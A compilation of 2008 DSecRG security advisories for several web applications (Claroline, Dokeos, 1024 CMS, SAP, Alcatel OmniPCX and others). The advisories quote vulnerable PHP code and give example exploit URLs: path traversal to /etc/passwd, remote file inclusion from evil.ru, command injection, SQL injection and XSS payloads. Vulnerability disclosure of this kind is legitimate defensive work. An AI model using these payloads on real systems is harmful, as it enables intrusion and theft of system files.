if (isset($_GET[lang])) $set_language = $_GET[lang];
$langfile = ROOT.'languages/'.$set_language.'.php';
require_once($langfile);
#
Example:
http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRGlang=../../../../../../../../../../../../../etc/passwd%00
Solution
No response or any updates from vendor.
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-032] Claroline 1.8.10 Multiple XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-032
Application:Claroline eLearning and eWorking platform
Versions Affected: 1.8.10
Vendor URL: http://www.claroline.net/
Bug:Multiple Linked XSS
Exploits: YES
Reported: 18.07.2008
Vendor Response:22.07.2008
Solution: YES
Date of Public Advisory:22.07.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Claroline system has multiple linked XSS vulnerabilities.
Details
***
1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL
string
1.1 Linked XSS vulnerabilities found in scripts:
claroline/announcements/messages.php
claroline/auth/lostPassword.php
claroline/auth/profile.php
claroline/calendar/myagenda.php
claroline/group/group.php
claroline/learnPath/learningPath.php
claroline/learnPath/learningPathList.php
claroline/learnPath/module.php
claroline/phpbb/index.php
claroline/tracking/courseLog.php
claroline/tracking/course_access_details.php
claroline/tracking/delete_course_stats.php
claroline/tracking/userLog.php
claroline/tracking/user_access_details.php
claroline/user/user.php
claroline/user/userInfo.php
Attacker can inject XSS in URL string.
Example:
http://[server]/[installdir]/claroline/calendar/myagenda.php?;scriptalert('DSecRG
XSS')/script
http://[server]/[installdir]/claroline/user/user.php?;scriptalert('DSecRG
XSS')/script
1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php
GET parameter view
Example:
http://[server]/[installdir]/claroline/tracking/courseLog.php?view=DSec;
STYLE=xss:expression(alert('DSecRG XSS'))
1.3 Linked XSS vulnerability found in claroline/tracking/toolaccess_details.php
GET parameter toolId
Example:
http://[server]/[installdir]/claroline/tracking/toolaccess_details.php?toolId=;scriptalert('DSecRG
XSS')/script
Solution
Vendor fix this flaw on 22.07.2008. New version 1.8.11 can be downloaded here:
http://downloads.sourceforge.net/claroline/claroline1811.tar.gz
http://downloads.sourceforge.net/claroline/claroline1811.zip
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-029] Local File Include in Dokeos E-Learning System 1.8.5
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-029
Application:Dokeos E-Learning System
Versions Affected: 1.8.5
Vendor URL: http://dokeos.com/
Bug:Local File Include
Exploits: YES
Reported: 01.07.2008
Vendor response:05.07.2008
Solution: YES
Date of Public Advisory:17.07.2008
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Dokeos E-Learning System system has local file include vulnerability in script
user_portal.php
Vulnerable GET parameter include.
Registered user can use this vulnerability.
Code
#
if (!empty ($_GET['include']) !strstr($_GET['include'], '/')
strstr($_GET['include'], '.html'))
{
include ('./home/'.$_GET['include']);
$pageIncluded = true;
}
else
..
#
Example:
http://[server]/[installdir]/user_portal.php?include=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.html
Fix Information
***
you can fix it following this official information
http://www.dokeos.com/wiki/index.php/Security Or wait a new release
Fixing this issue can be done by replacing line 770 of /user_portal.php by:
if (!empty ($_GET['include'])
preg_match('/^[a-zA-Z0-9_-]*\.html$/',$_GET['include']))
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
Regards,
Digital Security Research Group [DSecRG]
DIGITAL SECURITY
tel/fax: +7(812)703-1547
tel: +7(812)430-9130
e-mail: [EMAIL PROTECTED]
web: www.dsec.ru
This message and any attachment are confidential and may be privileged
or otherwise protected from disclosure. If you are not the intended
recipient any use, distribution, copying or disclosure is strictly
prohibited. If you have received this message in error, please notify
the sender immediately either by telephone or by e-mail and delete this
message and any attachment from your system. Correspondence via e-mail
is for information purposes only. Digital Security neither makes nor
accepts legally binding statements by e-mail unless otherwise agreed.
[DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-027
Application:1024 CMS
Versions Affected: 1.4.3, 1.4.4 RFC
Vendor URL: http://www.1024cms.com/
Bug:Multiple Remote/Local File Include
Exploits: YES
Reported: 18.06.2008
Second report: 27.06.2008
Vendor Response:NONE
Solution: NONE
Date of Public Advisory:04.07.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
1024 CMS has Remote File Include vulnerability and multiple Local File Include
vulnerabilities.
1. Remote/Local File Include vulnerabilities found in scripts:
themes/blog/layouts/standard.php
themes/default/layouts/standard.php
themes/portfolio/layouts/standard.php
themes/snazzy/layouts/standard.php
Code
#
?php include(./themes/.$theme_dir./layouts/basic_header.php); ?
div class=centerbigtable
?php
if(!isset($page_include)) {
if($page_ck['custom'] == '0')
include(./pages/.$page./default/content.php);
else include(./pages/custom/.$page./default/content.php);
} else include($page_include);
?
#
Example:
http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php
http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00
Multiple Local File Include vulnerabilities:
2. Local File Include vulnerability found in script
admin/lang/fr/reports/default.php
Code
#
if(isset($_GET['t'])) {
switch($_GET['t']) {
case forum:
include(../admin/lang/.$lang./reports/ops/forum.php);
break;
case download:
include(../admin/lang/.$lang./reports/ops/download.php);
break;
case news:
include(../admin/lang/.$lang./reports/ops/news.php);
break;
}
} else die(You cannot access this page directly);
#
Example:
http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=newslang=../../../../../../../../../../../../../boot.ini%00
3. Local File Include vulnerabilities found in scripts:
admin/ops/admins/default.php
admin/ops/reports/ops/download.php
admin/ops/reports/ops/forum.php
admin/ops/reports/ops/news.php
Code
#
?php
include(./themes/.$admin_theme_dir./templates/default_header.tpl);
...
#
Example:
http://[server]/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00
4. Local File Include vulnerabilities found in scripts:
lang/en/moderator/default.php
lang/fr/moderator/default.php
Code
#
if(isset($_GET['t'])) {
switch($_GET['t']) {
case forum:
include(./lang/.$lang./moderator/ops/forum.php);
break;
case download:
include(./lang/.$lang./moderator/ops/download.php);
break;
case gallery:
include(./lang/.$lang./moderator/ops/gallery.php);
break;
case news:
include(./lang/.$lang./moderator/ops/news.php);
break;
}
}
#
Example:
http://[server]/[installdir]/lang/en/moderator/default.php?t=newslang=../../../../../../../../../../../../../boot.ini%00
http://[server]/[installdir]/lang/fr/moderator/default.php?t=downloadlang=../../../../../../../../../../../../../boot.ini%00
5. Local File Include vulnerability found in script
lang/de/moderator/default.php
Code
#
if(isset($_GET['t'])) {
switch($_GET['t']) {
case forum:
include(./lang/.$lang./moderator/ops/forum.php);
break;
case download:
include(./lang/.$lang./moderator/ops/download.php);
break;
case news:
include(./lang/.$lang./moderator/ops/news.php);
break
[DSECRG-08-024] Multiple Security Vulnerabilities (RFI,LFI,XSS) in QuateCMS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-024
Application:Quate CMS
Versions Affected: 0.3.4
Vendor URL: http://www.quate.net/
Bugs: RFI, Multiple LFI, Directory traversal,
Multiple XSS
Exploits: YES
Reported: 18.03.2008
Second report: 25.03.2008
Vendor response:NONE
Solution: NONE
Date of Public Advisory:23.05.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Quate CMS system has multiple security vulnerabilities:
1. Multiple Remote/Local File Include
2. Multiple Linked XSS vulnerabilities
3. Directory traversal
Details
***
1. Quate CMS has Multiple Local File Include vulnerabilities.
1.1 Local File Include vulnerability found in script admin/includes/footer.php
Code
#
if ($not_logged_in != 1) {
if (file_exists(includes/themes/ .$row_secure['account_theme'].
/footer.php)) {
require_once(themes/ .$row_secure['account_theme']. /footer.php);
} else {
require_once(themes/ .$admin_template_default. /footer.php);
}
} else {
require_once(themes/ .$admin_template_default. /footer.php);
}
#
Example:
http://[server]/[installdir]/admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00
http://[server]/[installdir]/admin/includes/footer.php?not_logged_in=1admin_template_default=../../../../../../../../../../../../../etc/passwd%00
1.2 Remote and Local File Include vulnerability found in script
admin/includes/header.php
Code
#
if ($bypass_installed != 1) {
if (!is_file(../includes/installed)) {
...
require(../includes/simple_gui.php);
exit();
}
}
if ($bypass_restrict != 1) {
require_once($secure_page_path. includes/secure.php);
}
$admin_template_default = default;
if ($not_logged_in != 1) {
//echo $row_secure['account_theme'];
if (file_exists(includes/themes/ .$row_secure['account_theme'].
/header.php)) {
require_once(themes/ .$row_secure['account_theme']. /header.php);
} else {
require_once(themes/ .$admin_template_default. /header.php);
}
} else {
require_once(themes/ .$admin_template_default. /header.php);
}
#
Example:
http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1secure_page_path=http://evilhost/info.php%00
http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1bypass_restrict=1row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00
-
2. Linked XSS in Path vulnerability found in following pages:
/admin/index.php
/admin/login.php
/admin/credits.php
/upgrade/index.php
Example:
http://[server]/[installdir]/admin/login.php/;scriptalert(DSecRG
XSS)/script
http://[server]/[installdir]/upgrade/index.php/;IMG
SRC=javascript:alert('DSecRG XSS')
-
3. File Manager directory traversal
Administrator can access system files outside htdocs directory using directory
traversal vulnerability.
http://[server]/[installdir]/admin/filemanager.php?type=editdir=/../../../../../../../../..file=boot.ini
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-025] Local File Include in OneCMS 2.5
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-025
Application:OneCMS
Versions Affected: 2.5
Vendor URL: http://www.insanevisions.com/
Bug:Local File Include
Exploits: YES
Reported: 26.03.2008
Vendor Response:NONE
Solution: NONE
Date of Public Advisory:23.05.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Local File Include vulnerability found in script install_mod.php
Code
#
$mod = $_GET['load'];
$filexp = explode(., $mod);
$filetype = $filexp[1];
$file = $filexp[0];
$file2 = mods/$mod;
if (!is_numeric($mod)) { // makes sure that the user isnt entering a #
if ($filetype == php) {
if ($_GET['act'] == ) {
echo Are you sure you would like to install the b.$file./b
module?bra href='install_mod.php?load=.$mod.act=go'Yes/a;
}
if ($_GET['act'] == go) {
include ($file2);
...
#
Example:
http://[server]/[installdir]/install_mod.php?act=goload=1234.php../../../../../../../../../../../../../etc/passwd
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-023] SAP Web Application Server XSS Security Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-023
Application:SAP Web Application Server
Versions Affected: Version 7.0
Vendor URL: http://SAP.com
Bugs: XSS
Exploits: YES
Reported: 25.01.2008
Vendor response:25.01.2008
Date of Public Advisory:21.05.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
SAP Web Application Server system has Linked XSS security vulnerability
Details
***
Linked XSS vulnerability found in URL /sap/bc/gui/sap/its/webgui/ attacker can
inject XSS in URL string
also Web Dynpro ABAP and for BSP are vulnerable.
Example:
http://[server]:8000/sap/bc/gui/sap/its/webgui/aaa;img/src=javascript:alert('DSECRG_XSS')
-
Fix Information
***
The issue has been solved in the ICF system login and as such it is not only
relevant for the Web GUI, but also for Web Dynpro
ABAP and for BSP
Customers can download patches following the solution is documented in SAP note
1136770
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration
testing services, risk analysis and ISMS-related services and certification for
ISO/IEC 27001:2005 and PCI DSS standards.
Digital Security Research Group focuses on web application and database
security problems with vulnerability reports, advisories
and whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru
[DSECRG-08-020] Alcatel OmniPCX Office Remote Comand Execution
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020 Application:Alcatel OmniPCX Office Versions Affected: Alcatel OmniPCX Office since release 210/061.1 Vendor URL: http://alcatel.com Bugs: Remote command execution Exploits: YES Risk: High CVSS Score: 7.31 CVE-number: 2008-1331 Reported: 31.01.2008 Vendor response:01.02.2008 Customers informed: 07.03.2008 Published on PSIRT: 01.04.2008 Date of Public Advisory:21.05.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Introduction The OmniPCX Enterprise is an integrated communications solution for medium-sized businesses and large corporations. It combines the best of the old (legacy TDM phone connectivity) with the new (a native IP platform and support for Session Initiation Protocol, or SIP) to provide an effective and complete communications solution for cost-conscious companies on the cutting edge. (from the vendor's homepage) Description *** Alcatel OmniPCX Office Web Interface has critical security vulnerability Remote command execution The risk of this vulnerability is high. Any user which has access to the web interface of the OmniPCX Enterprise solution will be able to execute arbitrary commands on the server with the permissions of the webserver. Details *** Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi in parameter name id2 Variable id2 not being filtered when passed to the shell. Thus, arbitrary commands can be executed on the server by adding them to the user variable, separated by semicolons. You can find more details on this advisory on vendors website http://www1.alcatel-lucent.com/psirt/statements.htm under reference 2008001 Example: http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerrid2=91|cat%20/etc/passwd Fix Information *** Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here: http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-022] Multiple Security Vulnerabilities in Bolinos 4.6.1
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-022
Application:BolinOS
Versions Affected: 4.6.1
Vendor URL: http://www.bolinos.com
Bugs: Local File Include,Multiple XSS, System
information disclosure
Exploits: YES
Reported: 13.03.2008
Second report: 18.03.2008
Vendor response:none
Solution: none
Date of Public Advisory:25.03.2008
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
BolinOS system has multiple security vulnerabilities:
1. Local File Include
2. Multiple Linked XSS vulnerabilities
3. Multiple XSS in POST
4. System information disclosure
Details
***
1. Local File Include vulnerability found in
system/_b/contentFiles/gbincluder.php
Code
#
$actionpagetoinclude=$_GET[_bFileToInclude];
if($actionpagetoinclude!=
@file_exists(gBRootPath./$actionpagetoinclude)){
@include(gBRootPath./$actionpagetoinclude);
}
else{
echo NO FILE;
}
#
Example:
http://[server]/[installdir]/system/_b/contentFiles/gbincluder.php?_bFileToInclude=../../../../../../../../../../../../../etc/passwd
-
2. Multiple linked XSS vulnerabilities found.
2.1 Linked XSS vulnerability found in page
/system/actionspages/_b/contentFiles/gBImageViewer.php
Attacker can inject XSS in GET parameter url
Example:
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBImageViewer.php?url=scriptalert('DSecRG
XSS')/script
2.2 Linked XSS vulnerability found in page
/system/actionspages/_b/contentFiles/gBselectorContents.php
Attacker can inject XSS in GET parameter ForEditor.
Example:
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBselectorContents.php?ForEditor='IMG%20SRC=javascript:alert('DSecRG
XSS')
2.3 Linked XSS vulnerabilities found in following pages:
/system/actionspages/_b/contentFiles/gBLoginPage.php
/system/actionspages/_b/contentFiles/gBPassword.php
Attacker can inject XSS script in URL
Example:
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBLoginPage.php/;scriptalert('DSecRG
XSS')/script
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBPassword.php/;scriptalert('DSecRG
XSS')/script
-
3. Multiple XSS in POST vulnerabilities, attacker can inject XSS in POST
parameter.
3.1 Vulnerability found in script
/system/actionspages/_b/contentFiles/gBLoginPage.php
POST parameter formlogin.
Example:
POST
/bolinos/system/actionspages/_b/contentFiles/gBLoginPage.php?bAddress=bolinos.sessions
HTTP/1.0
Content-Length: 81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET
CLR 2.0.50727)
formlogin=%27img%20src%3d%22javascript:alert(%27DSecRG%20XSS%27)%22BtLogin.x=
3.2 Vulnerability found in page /help/index.php
POST parameter bolini_searchengine46Search.
Example:
bolini_searchengine46Search = 'IMG
SRC=javascript:alert(quot;DSecRG#x20;XSSquot;)
4. System information disclosure
Non-authentication user can access phpinfo() page.
http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBphpInfo.php
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
[DSECRG-08-019] LFI in PowerBook 1.21
Hello, bugtraq.
[DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory
Application:PowerBook
Versions Affected: 1.21
Vendor URL: http://www.powerscripts.org/
Bug:Local File Include
Exploits: YES
Reported: 01.02.2008
Vendor Response:none
Solution: none
Date of Public Advisory:..2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Local File Include vulnerability found in script pb_inc/admincenter/index.php
Non-authentication user can directly access to this script.
To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config
file.
Code
#
if (!$page) {
$page = home;
}
$page .= .inc.php;
if(file_exists($page) == false) {
echo
div align=\center\Sorry, the page b$page/b does not exist!/div
;
} else {
include($page);
}
#
Example:
http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP
mailto:[EMAIL PROTECTED]
[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-017
Application:Flyspray (web-based bug tracking system)
Versions Affected: 0.9.9.4
Vendor URL: http://www.flyspray.org
Bugs: SiXSS, Stored XSS, Brute Force
Exploits: YES
Reported: 08.02.2008
Vendor response:08.02.2008
Solution: 24.02.2008
Date of Public Advisory:03.03.2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Flyspray system has multiple security vulnerabilities:
1. SiXSS in POST
2. Stored XSS in POST
3. Login Error Messages Credential Enumeration
Details
***
1. SiXSS in POST, attacker can inject XSS code in SQL Error.
1.1 Vulnerabilities found in script index.php?do=myprofile.
POST parameters tasks_perpage, time_zone, account_enabled, notify_own.
Example:
tasks_perpage = scriptalert('DSecRG XSS')/script
time_zone = img src=javascript:alert('DSecRG XSS')
1.2 Vulnerabilities found in script index.php?do=adminarea=newproject.
POST parameters anon_open, others_view.
Example:
anon_open = img src=javascript:alert('DSecRG XSS')
1.3 Vulnerabilities found in script index.php?do=adminarea=cat.
POST parameters lft[4], rgt[4].
Example:
rgt[4] = scriptalert('DSecRG XSS')/script
1.4 Vulnerabilities found in script index.php?do=pmarea=prefs.
POST parameters comment_closed, project_is_active.
Example:
project_is_active = img src=javascript:alert('DSecRG XSS')
1.5 Vulnerabilities found in script index.php?do=details.
POST parameters closedby_version, edit, edit_start_time,
find_user, item_status, operating_system, percent_complete,
product_category, project_id, reportedver, task_priority,
task_severity, task_type, .
Example:
project_id = scriptalert('DSecRG XSS')/script
item_status = img src=javascript:alert('DSecRG XSS')
-
2. Vulnerability found in script index.php?do=details in task details page.
POST parameter item_summary.
Example:
item_summary = scriptalert('DSecRG XSS')/script
-
3. Login Error Messages Credential Enumeration
When trying to login using bad credentials, the application generates different
error messages when the user inputs an invalid username and an invalid password
separately.
Attacker ca use the brute force technique to establish valid usernames, before
proceeding to attempt discovery of the associated password.
Fix Information
***
Flyspray was altered to fix this flaw on 24.02.2008. Updated version (0.9.9.5)
can be downloaded here:
http://www.flyspray.org/download/
Vendor advisory
***
http://flyspray.org/fsa:3
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-016
Application:Jinzora Media Jukebox
Versions Affected: 2.7.5
Vendor URL: http://www.jinzora.com/
Bugs: Multiple XSS Injections
Exploits: YES
Reported: 04.02.2008
Second report: 12.02.2008
Vendor response:NONE
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Jinzora system has multiple security vulnerabilities:
1. Linked XSS
2. Stored XSS
Details
***
1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL
string.
1.1 Linked XSS vulnerabiliies found in index.php.
GET parameters frontend, set_frontend, jz_path, theme, set_theme.
Example:
http://[server]/[installdir]/index.php?frontend=IMG
SRC=javascript:alert('DSecRG XSS')
1.2 Linked XSS vulnerabilities found in ajax_request.php.
GET parameters frontend, theme, language.
Example:
http://[server]/[installdir]/ajax_request.php?language=IMG
SRC=javascript:alert('DSecRG XSS')
1.3 Linked XSS vulnerability found in slim.php. GET parameter jz_path.
Example:
http://[server]/[installdir]/slim.php?jz_path=IMG
SRC=javascript:alert('DSecRG XSS')
1.4 Linked XSS vulnerabilities found in popup.php.
GET parameters frontend, theme, jz_path.
Example:
http://[server]/[installdir]/popup.php?theme=IMG SRC=javascript:alert('DSecRG
XSS')
1.5 Linked XSS in Path vulnerability found in index.php and slim.php.
Example:
http://[server]/[installdir]/index.php/;scriptalert('DSecRG XSS')/script
-
2. Stored XSS
2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter
name siteNewsData
Example:
siteNewsData = /textareascriptalert('DSecRG XSS')/script
2.1 Vulnerability found in script popup.php?ptype=playlistedit in post
parameter name query
Example:
query = scriptalert('DSecRG XSS')/script
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
--
Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015
Application:Dokeos E-Learning System
Versions Affected: 1.8.4
Vendor URL: http://dokeos.com
Bugs: Multiple SQL Injections,Multiple Blind SQL
Injections,Multiple XSS, etc.
Exploits: YES
Reported: 25.01.2008
Vendor response:28.01.2008
Patch released: 12.02.2008
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Dokeos E-Learning System system has multiple security vulnerabilities:
1. Multiple SQL Injections
2. Multiple Blind Sql Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS
Details
***
1. Multiple SQL Injections
1.1 Attacker can inject SQL code in module /whoisonline.php vulnerable
parametr id
Attacker must have valid user creditionals
Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+dsec=dsecrg+union+select+user(),version()/*
1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable
parameter tracking_list_coaches_column
Example:
http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASCtracking_list_coaches_page_nr=1tracking_list_coaches_per_page=20view=admin
tracking_list_coaches_column=0';
1.3 Attacker can inject SQL code in module
/dokeos/main/create_course/add_course.php POST Parameter tutor_name
Example:
POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php
title=1234category_code=PROJwanted_code=1234course_language=slovenian_qf__add_course=
tutor_name='
-
2. Multiple SQL Injections
2.1 Vulnerability found in script index.php in header parameter Referer
Example:
GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '
2.1 Vulnerability found in script /main/admin/class_list.php? in header
parameter X-Fowarded-For
-
3. Stored XSS vulnerability found in /main/auth/inscription.php attacker can
inject XSS in POST parameter username
-
4. Multiple linked XSS
4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php
attacker can inject XSS in parameter courseCode
Example:
http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=;scriptalert('DSecRG
XSS')/script
4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker
can inject XSS in parameter category
Example:
http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=scriptalert('DSecRG
XSS')/script HTTP/1.0
4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php
attacker can inject XSS in parameter cmessage
Example:
http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_messagemessage=%22%27img/src=javascript:alert('DSecRG
XSS')
-
5. Image XSS vulnerability in page main/auth/profile.php attacker can upload
avatar picture with XSS code:
Example:
More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)
-
Fix Information
***
Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded
here:
http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)
Digital Security Research Groupmailto:[EMAIL PROTECTED]
[DSECRG-08-011 | FIX INFORMATION] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011 | FIX INFORMATION Application:Astrosoft HelpDesk Versions Affected: 1.95.228 Vendor URL: http://astrosoft.ru/ Bugs: Multiple XSS Injections Exploits: YES Reported: 29.01.2008 Date of Public Advisory:04.02.2008 Vendor response:05.02.2008 Updated Report: 14.02.2008 Solution: HelpDesk was altered to fix this flaw on 13.02.2008. Updated version - 1.95.228 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-014] Multiple LFI in PowerNews (Newsscript) 2.5.6
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-014
Application:PowerNews (Newsscript)
Versions Affected: 2.5.6
Vendor URL: http://www.powerscripts.org/
Bug:Multiple Local File Include
Exploits: YES
Reported: 01.02.2008
Vendor Response:none
Solution: none
Date of Public Advisory:08.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
